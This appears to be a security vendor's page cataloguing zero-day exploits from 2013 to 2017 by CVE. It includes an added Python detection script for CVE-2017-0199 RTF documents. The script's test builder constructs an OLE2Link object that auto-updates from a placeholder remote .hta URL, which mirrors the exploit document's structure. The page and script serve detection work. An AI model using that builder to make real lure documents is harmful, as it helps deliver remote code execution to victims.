Recent Zero-Day Exploits

Signature-based defenses are largely blind to zero-day threats

Zero-day attacks exploit software flaws that are unknown to the vendor and for which no patch or fix yet exists.

Zero-day attacks are extremely difficult to detect with traditional defenses, which rely on malware signatures and URL reputation. For a zero-day, that information does not yet exist, so there is nothing for the signature to match. Skilled attackers can therefore keep their malware undetected on a system for months or even years, leaving ample time to cause irreparable harm.

Recently discovered zero-day attacks point to three trends: operating-system-level protections are becoming less effective, watering-hole attacks are becoming more common, and attacks are growing more sophisticated and better at bypassing organizational defenses.

Recent zero-day exploits and vulnerabilities

2017 zero-day exploits

  • CVE-2017-0261 – EPS “restore” use-after-free: FireEye detected a “restore” use-after-free vulnerability in the Encapsulated PostScript (EPS) filter of Microsoft Office being used to deliver SHIRIME malware by the Turla group, and NETWIRE malware by an unknown financially motivated actor.
  • CVE-2017-0262 – Type confusion in EPS: FireEye observed APT28 using a type confusion vulnerability in the EPS filter of Microsoft Office to deliver a GAMEFISH payload.
  • CVE-2017-0263 – win32k!xxxDestroyWindow use-after-free: FireEye observed APT28 using this kernel-mode use-after-free to escalate privileges during delivery of a GAMEFISH payload. It was chained with CVE-2017-0262, which supplied the initial code execution.
  • CVE-2017-0199 – In-the-wild attacks leveraging the HTA handler: FireEye detected malicious Microsoft Office RTF documents exploiting CVE-2017-0199. When the user opens the document, an embedded linked OLE object fetches an HTML Application (HTA) file from an attacker-controlled server; Office hands the file to the HTA handler (mshta.exe), which runs the Visual Basic script it contains and the PowerShell commands inside it. No macros are required, so macro-blocking policies do not stop it.
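
As an added example for detection teams (not FireEye's code, and not from the original page), the Python script below statically triages RTF files for the published static indicators of the CVE-2017-0199 documents: an embedded OLE object whose OLE1 header carries the class name “OLE2Link”, a URL moniker pointing at a remote .hta file, and the \objupdate control word that makes Word refresh the link as soon as the file is opened. The sample RTF is constructed inside the script; the host name example.invalid is a placeholder, not a real indicator, and the assumed URL moniker layout is called out in the code.

```python
"""Static triage of RTF files for CVE-2017-0199-style OLE2Link objects.

Constructed example for this page (not FireEye code). It looks for the
static indicators published for the in-the-wild RTF samples:
  * an embedded OLE object (\\object ... \\objdata) whose OLE1 header
    names the class "OLE2Link";
  * a URL moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} followed by
    the remote URL, which in those samples pointed at an .hta file;
  * the \\objupdate control word, which makes Word refresh the link on open.
The sample document is built in build_sample(); its host name is a placeholder.
"""
import re
import uuid

URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B").bytes_le
OBJDATA_RE = re.compile(rb"\\objdata\b\s*([0-9A-Fa-f\s]+)")


def extract_objdata(rtf: bytes) -> list:
    """Decode every hex-encoded \\objdata blob in the RTF into raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]          # tolerate a truncated final nibble
        try:
            blobs.append(bytes.fromhex(hexstr.decode("ascii")))
        except ValueError:
            continue
    return blobs


def moniker_urls(blob: bytes) -> list:
    """Pull the URL out of every serialised URL moniker in an OLE blob.

    Assumed layout (URL moniker persistence format): 16-byte CLSID, a DWORD
    byte length, then the UTF-16LE URL terminated by a NUL.
    """
    urls = []
    pos = blob.find(URL_MONIKER_CLSID)
    while pos >= 0:
        body = blob[pos + 16:]
        if len(body) >= 4:
            n = int.from_bytes(body[:4], "little")
            if 2 <= n <= 4096 and n % 2 == 0 and len(body) >= 4 + n:
                url = body[4:4 + n].decode("utf-16-le", errors="replace")
                urls.append(url.rstrip("\x00"))
        pos = blob.find(URL_MONIKER_CLSID, pos + 16)
    return urls


def triage_rtf(rtf: bytes) -> dict:
    """Report the indicators found in one RTF and an overall verdict."""
    blobs = extract_objdata(rtf)
    urls = [u for b in blobs for u in moniker_urls(b)]
    findings = {
        "has_objdata": bool(blobs),
        "objupdate": b"\\objupdate" in rtf,
        "ole2link": any(b"OLE2Link" in b for b in blobs),
        "urls": urls,
        "hta_url": any(u.split("?")[0].lower().endswith(".hta") for u in urls),
    }
    # OLE2Link alone is rare in benign documents; a remote .hta link or a
    # forced update on open makes the verdict firm.
    findings["suspicious"] = findings["ole2link"] and (
        findings["hta_url"] or findings["objupdate"])
    return findings


def build_sample(url: str) -> bytes:
    """Construct a minimal RTF with an OLE2Link object (test input only)."""
    url16 = url.encode("utf-16-le") + b"\x00\x00"
    # OLE1 object header: version 0x501, format 2 (embedded), class name
    ole1 = (b"\x01\x05\x00\x00" + b"\x02\x00\x00\x00"
            + len(b"OLE2Link\x00").to_bytes(4, "little") + b"OLE2Link\x00")
    moniker = URL_MONIKER_CLSID + len(url16).to_bytes(4, "little") + url16
    objdata = (ole1 + moniker).hex().encode("ascii")
    return (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw9027\\objh5070"
            b"{\\*\\objclass Word.Document.8}{\\*\\objdata " + objdata + b"}}}")


if __name__ == "__main__":
    report = triage_rtf(build_sample("http://example.invalid/update.hta"))
    for key, value in report.items():
        print(f"{key:12} {value}")
```

These indicators describe the documents seen in April 2017. An attacker can rename the class string, serve the payload under a different extension, or nest the object inside another container, which is exactly the signature-lag problem the opening of this page describes; pair a scanner like this with behavioural detection, such as alerting when an Office process spawns mshta.exe.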

2016 zero-day exploits

2015 zero-day exploits

In 2015, FireEye discovered 8 of the 13 zero-day exploits found in the wild that year.

2014 zero-day exploits

In 2014, FireEye discovered 6 of the 12 zero-day exploits found in the wild that year.

  • CVE-2014-0322: A watering-hole exploit that targeted Internet Explorer 10 users visiting a compromised website.
  • CVE-2014-1776 – Internet Explorer 9 through 11: A memory-corruption vulnerability affecting IE 6 through 11; the in-the-wild attacks targeted IE 9 through 11 and bypassed ASLR and DEP to gain arbitrary memory access and run code.
  • CVE-2014-4148: A Windows kernel vulnerability in the TrueType Font (TTF) processing subsystem. A malicious TTF embedded in a Microsoft Office document was used to deliver it to an international organization.
  • CVE-2014-4113: Another Windows kernel vulnerability, a local elevation-of-privilege (EoP) flaw affecting Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2 and Windows Server 2008/R2.
  • CVE-2014-0502: A zero-day Adobe Flash Player exploit affecting the then-current releases (12.0.0.44 and 11.7.700.261).
  • CVE-2014-4114: The “Sandworm” vulnerability, affecting all supported versions of Microsoft Windows at the time and used by the Sandworm Team in a Russian cyber-espionage campaign against NATO, the European Union, and telecommunications and energy sector targets.

2013 zero-day exploits

In 2013, FireEye discovered 11 of the 15 zero-day exploits found in the wild that year.

  • CVE-2012-4792: Hidden on the website of the Council on Foreign Relations, this malicious JavaScript targeted Internet Explorer users in a watering-hole attack.
  • CVE-2013-0422: A Java 7 vulnerability used by exploit kits to deliver ransomware that locked Windows users out of their computers.
  • CVE-2013-0634: An Adobe Flash Player vulnerability exploited through malicious ActionScript against users on Windows, Mac, Linux and Android.
  • CVE-2013-0640 / CVE-2013-0641: A pair of Adobe Reader vulnerabilities exploited via JavaScript in PDF files to bypass ASLR and DEP and install a remote administration tool.
  • CVE-2013-1493: A Java Runtime Environment vulnerability whose exploit corrupted the memory of the HotSpot virtual machine, giving attackers control over the targeted systems.
  • CVE-2013-1347: A use-after-free in Internet Explorer 8, used against Windows XP users who visited the U.S. Department of Labor website.
  • CVE-2013-3918 / CVE-2014-0266: A pair of vulnerabilities chained in a watering-hole attack against Internet Explorer users: a use-after-free in an ActiveX control and an information-disclosure flaw used to defeat ASLR, together affecting a wide range of Windows versions.
  • CVE-2013-5065: A local elevation-of-privilege vulnerability in the Windows XP and Windows Server 2003 kernel. Combined with a separate code-execution exploit, it let an attacker move from a standard user account to running code in the kernel.
  • CVE-2012-4681: A Java 7 (JRE 1.7.x) vulnerability that allowed a malicious applet to escape the Java sandbox and run arbitrary code.